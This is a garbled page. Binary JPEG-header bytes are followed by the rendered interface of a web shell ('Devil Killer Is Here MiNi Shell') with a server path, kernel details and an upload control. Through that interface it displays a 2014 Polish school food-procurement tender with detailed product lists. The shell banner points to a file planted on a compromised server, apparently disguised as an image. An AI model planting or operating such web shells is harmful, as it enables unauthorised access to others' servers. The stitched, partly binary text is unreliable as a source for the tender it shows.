JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141205/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141205/400258-N-2014.html

<p class="kh_header"><b>Radostowice: Dostawa produktów spożywczych dla Szkoły Podstawowej im. Adama Mickiewicza w Kobielicach na 2015 rok.</b><br>
<b>Numer ogłoszenia: 400258 - 2014; data zamieszczenia: 05.12.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szkoła Podstawowa im. Adama Mickiewicza w Kobielicach , ul. Topolowa 61, 43-262 Radostowice, woj. śląskie, tel. 32 212 52 26, faks 32 212 52 26.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spkobielice.edupage.org</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa produktów spożywczych dla Szkoły Podstawowej im. Adama Mickiewicza w Kobielicach na 2015 rok..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest Dostawa produktów spożywczych dla Szkoły Podstawowej im. Adama Mickiewicza w Kobielicach w 2015 r., tj. od 02.01.2015 r. do 31.12.2015 r. obejmująca grupy towarów spożywczych zgodnie z załącznikami A do G.

Zakres przedmiotu zamówienia został podzielony na VII części. Wykonawca może złożyć ofertę na wybraną do realizacji część zamówienia:
1.	Część I - Pieczywo, świeże wyroby piekarskie i ciastkarskie- zgodnie z zał. A do SIWZ
2.	Część II _ Mięso, wędliny, konserwy i wyroby mięsne -
zgodnie z zał. B do SIWZ
3.	Część III - Drób- zgodnie z zał. C do SIWZ
4.	Część  IV - Ryby- zgodnie z zał. D do SIWZ
5.	Część V -Warzywa, owoce i przetwory - zgodnie z zał. E do SIWZ
6.	Część VI - Oleje, tłuszcze zwierzęce i roślinne, produkty mleczarskie
i jaja - zgodnie z zał. F do SIWZ
7.	Część VII -  Pozostałe produkty spożywcze - zgodnie z zał. G do SIWZ.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.10.00.00-9, 15.20.00.00-0, 15.30.00.00-1, 15.40.00.00-2, 15.50.00.00-3, 15.60.00.00-4, 15.80.00.00-6, 15.81.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 02.01.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełnienia warunku wykonawcy zobowiązani są wypełnić oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu (oświadczenie z art. 22 ust. 1 ustawy, na podstawie art. 44 ustawy) - załącznik nr 3 do SIWZ,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełnienia warunku wykonawcy zobowiązani są wypełnić oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu (oświadczenie z art. 22 ust. 1 ustawy, na podstawie art. 44 ustawy) - załącznik nr 3 do SIWZ,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełnienia warunku wykonawcy zobowiązani są wypełnić oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu (oświadczenie z art. 22 ust. 1 ustawy, na podstawie art. 44 ustawy) - załącznik nr 3 do SIWZ,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełnienia warunku wykonawcy zobowiązani są wypełnić oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu (oświadczenie z art. 22 ust. 1 ustawy, na podstawie art. 44 ustawy) - załącznik nr 3 do SIWZ,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełnienia warunku wykonawcy zobowiązani są wypełnić oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu (oświadczenie z art. 22 ust. 1 ustawy, na podstawie art. 44 ustawy) - załącznik nr 3 do SIWZ,</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Zgodnie z punktem III 3.2 niniejszego ogłoszenia.;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca może złożyć jedną ofertę. Złożenie większej liczby ofert lub oferty zawierającej rozwiązania alternatywne lub oferty wariantowej, spowoduje odrzucenie wszystkich ofert złożonych przez danego Wykonawcę.
Oferta musi być wypełniona zgodnie z treścią zał. nr 1 do SIWZ i podpisana przez   osoby (osobę) uprawnione do składania oświadczeń woli w imieniu wykonawcy (podpis(y) winien być opatrzony pieczęcią imienną osoby (osób) uprawnionych do składania oświadczeń woli w imieniu wykonawcy, a w przypadku braku pieczęci należy złożyć czytelny podpis określający imię i nazwisko w w osoby (osób).
Wraz z ofertą należy złożyć odpowiednio na każdą wybraną do realizacji część, wypełnione zał. A-G do SIWZ, stanowiące formularze cenowe.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Kierując się zapisami art. 144 ust. 1 Ustawy dnia 29 stycznia 2004 r. Prawo zamówień publicznych Zamawiający dopuszcza dokonanie zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w następujących sytuacjach:
1.	zmiany ustawowej stawki podatku VAT - w takim przypadku obniżenie lub podwyższenie wynagrodzenia jest możliwe w wysokości odpowiadającej zmianie podatku,
2.	dopuszcza się na wniosek WYKONAWCY kwartalną waloryzację cen dostarczanych produktów spożywczych w oparciu o wskaźnik cen towarów i usług konsumpcyjnych ogółem w danym kwartale, podawanym przez Prezesa Głównego Urzędu Statystycznego, ogłaszany w Dzienniku Urzędowym R.P. Monitor Polski. Warunkiem zastosowania waloryzacji, o której mowa wyżej jest wzrost tego wskaźnika ponad 3 % w stosunku kwartał do poprzedniego kwartału,
3.	wystąpienia siły wyższej uniemożliwiającej wykonanie przedmiotu umowy zgodnie ze SIWZ,
4.	zmiany powszechnie obowiązującego prawa w zakresie mającym wpływ na realizację umowy po dacie odniesienia,
5.	gdy istnieje obiektywna konieczność wprowadzenia zmian, np. gdy spełnienie świadczenia byłoby połączone z nadmiernymi trudnościami albo groziłoby jednej ze stron rażącą stratą w rozumieniu art. 357 KC,
6.	zmiana wynika z okoliczności, których nie można było przewidzieć w momencie zawarcia umowy,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.spkobielice.edupage.org<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szkoła Podstawowa im. Adama Mickiewicza w Kobielicach , ul. Topolowa 61, 43-262 Radostowice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.12.2014 godzina 14:00, miejsce: Szkoła Podstawowa im. Adama Mickiewicza w Kobielicach , ul. Topolowa 61, 43-262 Radostowice.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> PIECZYWO, ŚWIEŻE WYROBY PIEKARSKIE I CIASTKARSKIE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	 Francuskie (różne) 150 g	
szt.	60
2.	 Półfrancuskie 140 g	szt.	80
3.	Babeczki kruche z owocami 180g.	szt.	30
4.	Babka cytrynowa 320g	szt.	30
5.	Babka drożdżowa z rodzynkami 450g	szt.	10
6.	Babka firmowa 450g	szt.	6
7.	Babka jogurtowa 500g	szt.	10
8.	Babka piaskowa 
550g	szt.	30
9.	Biszkopty	kg	2
10.	Bułka grahamka 80g	szt.	100
11.	Bułka jogurtowa 80g	szt.	20
12.	Bułka kajzerka 50g	szt.	1200
13.	Bułka kanapkowa krojona (wek 300g)	szt.	400
14.	Bułka kukurydziana 70g	szt.	150
15.	Bułka maślana 80g	szt.	300
16.	Bułka pikantno-
pomidorowa 65g	szt	50
17.	Bułka pikantno-serowa 65g	szt.	50
18.	Bułka serce
100g	szt.	25
19.	Bułka serowa 70g	szt.	80
20.	Bułka staropolska 100g	szt.	1500
21.	Bułka szpinakowa 100g	szt	20

22.	Bułka tarta 0,5kg	kg	150
23.	Bułka zwykła 90g	szt.	2300
24.	Bułka żytnia 70g	szt.	100
25.	Chleb 900g krojony	szt.	500
26.	Chleb dietetyczny krojony 350g 	szt.	2
27.	Chleb krajan krojony 450g	szt	15
28.	Chleb krojony ze słonecznikiem 500 g	szt.	10
29.	Chleb kukurydziany 450g  krojony	szt.	2
30.	Chleb orkiszowy krojony	kg	4
31.	Chleb wieloziarnisty, krojony, 500g.	szt.	10
32.	Chleb witalny krojony 500g 	szt.	4
33.	Chleb z błonnikiem krojony 600g	szt.	4
34.	Chleb żytni z koperkiem krojony 400g 	szt.	4
35.	Ciasto zebra	kg	4
36.	Crossanty  z nadzieniem
owocowym 	kg.	6
37.	Crossanty z nadzieniem 
marcepanowym 	kg.	6
38.	Drożdżówka (różne smaki) 160 g	szt.	100
39.	Drożdżówka Mini (różne) 100g	szt.	200
40.	Drożdżówka podwójna
140g	szt.	30
41.	Francuskie 
z marcepanem 150g	szt.	30
42.	Groszek ptysiowy	kg	2
43.	Herbatniki kruche różne rodzaje	kg	6
44.	Jagodzianka 130g	szt.	30
45.	Keks 450g
	szt.	20
46.	Kołocz z jabłkami	kg	5
47.	Kołocz z posypką	kg
	5
48.	Makowiec
	kg	2
49.	Muffinka różne smaki 70g	szt.	10
50.	Pączki (różne)100g	szt.	80
51.	Pączki mini	kg	3
52.	Pączki serowe
małe	kg	6
53.	Rogal z nadzieniem (różne)150g	szt.	80
54.	Rogalik zwykły 100g	szt.	500
55.	Szarlotka na kruchym	kg	4.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 02.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> MIĘSO , WĘDLINY, KONSERWY I WYROBY MIĘSNE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Boczek wędzony kg	15	 	 	 		 
2.	Kiełbasa domowa kg	130	 	 	 		 
3.	Kiełbasa drobiowa krojona 	kg	4	 	 	 		 
4.	Kiełbasa kasztelańska krojona	kg	3	 	 	 		 
5.	Kiełbasa zwyczajna kg	140	 	 	 		 
6.	Kiełbaska win erka	kg	40	 	 	 		 
7.	Kiełbaski Śląskie kg	30	 	 	 		 
8.	Kita wieprzowa kg	10	 	 	 		 
9.	Kości wędzone kg	50	 	 	 		 
10.	Łopatka wieprzowa b k	kg	550	 	 	 		 
11.	Mielonka kg	20	 	 	 		 
12.	Mięso garmażeryjne kg	300	 	 	 		 
13.	Mortadela kg	15	 	 	 		 
14.	Pasztet drobiowy 160g, wartość energ. W 100g produktu: 220 kcal, białko 7,5 g, węglowodany 5,5 g, tłuszcze 16,3 g p	60	 	 	 		 
15.	Pasztet wieprzowy 	kg	2	 	 	 		 
16.	Polędwica wędz. Gotowana krojona	kg	5	 	 	 		 
17.	Schab z kością	kg	300	 	 	 		 
18.	Szynka drobiowa krojona	kg	10	 	 	 		 
19.	Szynka konserwowa krojona	kg	4	 	 	 		 
20.	Szynka koperkowa krojona	kg	4	 	 	 		 
21.	Szynka mielona krojona	kg	6	 	 	 		 
22.	Szynka prasowana wieprzowa krojona	kg	2	 	 	 		 
23.	Szynka wiejska krojona	kg	5	 	 	 		 
24.	Szynka wieprzowa krojona	kg	5	 	 	 		 
25.	Wołowe b k	kg	180	 	 	 		 
26.	Żeberka wędzone	kg	6	 	 	 		 
27.	Żeberka wieprzowe 	kg	2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 02.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> DRÓB.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Filet z kurczaka	kg	450
2.	Kurczak 	kg	50
3.	Mięso gulaszowe z indyka	kg	180
4.	Podudzie z kurczaka (pałka)	kg	130
5.	Porcje rosołowe	kg	170
6.	Udziec z indyka	kg	45
7.	Udziec z kurczaka	kg	200
8.	Wątroba z indyka	kg	12
9.	Żołądki z kurczaka	kg	4.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 02.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> RYBY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Filet z makreli  w sosie pomidorowym 170g	puszki	16
2.	Filet z soli	kg	170
3.	Paluszki rybne panierowana - mrożone 57% filet rybny, wartość energ w 100g 230 kcal	kg	12
4.	Tuńczyk w sosie własnym 170g	puszki	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.20.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 02.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> WARZYWA , OWOCE I PRZETWORY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Ananas w puszce 450g	  szt.	4	 	 	 		 
2.	Arbuz 	kg	2	 	 	 		 
3.	Banan	kg	300	 	 	 		 
4.	Brokuł mrożony 450g	szt.	40	 	 	 		 
5.	Brokuł świeży	szt.	10	 	 	 		 
6.	Brzoskwinie kondensowane w puszce 850 g	szt. 4	 	 	 		 
7.	Brzoskwinie świeże	szt.	300	 	 	 		 
8.	Buraki	kg	250	 	 	 		 
9.	Cebula	kg	300	 	 	 		 
10.	Czosnek	szt.	100	 	 	 		 
11.	Dżem 280g , bez konserwantów, zawartość cukru w 100g produktu-38g	szt.	150	 	 	 		 
12.	Fasola Jaś kg	50	 	 	 		 
13.	Fasola szparagowa 450g	szt.	4	 	 	 		 
14.	Groch łuskany	kg	40	 	 	 		 
15.	Groszek - mrożonka, 450g.	szt.	5	 	 	 		 
16.	Groszek konserwowy 400g	szt	40	 	 	 		 
17.	Gruszka	kg	4	 	 	 		 
18.	Jabłka	kg	400	 	 	 		 
19.	Kalafior mrożony 450g	szt.	250	 	 	 		 
20.	Kalafior świeży	szt.	80	 	 	 		 
21.	Kalarepa	szt.	4	 	 	 		 
22.	Kapusta biała	kg	500	 	 	 		 
23.	Kapusta biała nowa	szt.	120	 	 	 		 
24.	Kapusta czerwona	kg	300	 	 	 		 
25.	Kapusta czerwona nowa	szt.	30	 	 	 		 
26.	Kapusta kiszona	kg	250	 	 	 		 
27.	Kapusta pekińska	szt.	50	 	 	 		 
28.	Kapusta pekińska	kg	40	 	 	 		 
28.	Kiwi	szt	15	 	 	 		 
30.	Koncentrat buraczany 300ml 59,3% buraków ćwikłowych	szt 	4	 	 	 		 
31.	Koncentrat pomidorowy 30% 1l	szt.	120	 	 	 		 
32.	Kukurydza konserwowa 400g, 74 kcal w 100g	szt. 4	 	 	 		 
33.	Mandarynka	kg	200	 	 	 		 
34.	Marchew	kg	300	 	 	 		 
35.	Marchewka z groszkiem - mrożonka, 450g.	szt.	4	 	 	 		 
36.	Mrożonka zupa 450g	szt.	120	 	 	 		 
37.	Nektarynka	szt.	300	 	 	 		 
38.	Ogórek kiszony	kg	80	 	 	 		 
39.	Ogórek konserwowy 0,9l.	
szt. 	150	 	 	 		 
40.	Ogórek zielony	kg	120	 	 	 		 
41.	Papryka konserwowa 0,9 l	szt	20	 	 	 		 
42.	Papryka świeża	kg	20	 	 	 		 
43.	Pieczarka	kg	80	 	 	 		 
44.	Pietruszka	kg	40	 	 	 		 
45.	Pomarańcza	kg	150	 	 	 		 
46.	Pomidor	kg	40	 	 	 		 
47.	Por	szt.	120	 	 	 		 
48.	Rzodkiewka	pęczek	10	 	 	 		 
49.	Sałata	szt.	2	 	 	 		 
50.	Seler	kg	40	 	 	 		 
51.	Sok owocowy 300ml, plastikowe opakowanie, produkowany w technologii:Top Aseptic	szt.	400	 	 	 		 
52.	Sok wieloowocowy 200ml kartonik ,bez zawartości cukru	szt.	900	 	 	 		 
53.	Syrop owocowy 420 ml	szt.	10	 	 	 		 
54.	Szczypiorek	pęczek	8	 	 	 		 
55.	Szpinak mrożony 450g	szt.	50					
56.	Truskawka mrożona 450g	szt.	20					
57.	Ziemniaki	kg	3600.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 02.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> OLEJE TŁUSZCZE ZWIERZĘCE I ROŚLINNE, PRODUKTY MLECZARSKIE I JAJA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Deser czekoladowy lub waniliowy z bitą śmietaną, 175g, wartość energ.- 101 kcal w 100g produktu	szt	30
2.	Deser mleczny z czekoladą, 150g , wartość energ. w 100g produktu-195 kcal, zawartość tłuszczu w 100g produktu-13,3 g	szt	100
3.	Deser z bitą śmietaną 100g, wartość energ. w 100g produktu-99 kcal, zawartość tłuszczu w 100g produktu-3 g 	szt	30
4.	Deser- ryż na mleku z owocami, 180 g	szt	30
5.	Jaja rozmiar L	szt	4000
